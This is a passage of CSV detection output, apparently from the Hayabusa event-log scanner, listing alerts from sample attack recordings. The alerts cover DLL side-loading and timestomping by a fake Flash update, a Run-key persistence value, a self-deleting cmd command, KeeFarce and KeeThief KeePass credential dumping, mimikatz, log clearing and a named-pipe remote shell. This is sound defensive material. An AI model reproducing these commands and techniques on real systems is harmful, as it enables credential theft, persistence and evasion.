SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL 
File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: 
SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx 
+2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: 
C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 
+09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,../hayabusa-rules/hayabusa/default/alerts/System/7040_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 
365ABB72-65A9-5CC7-0000-00104E5C2400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
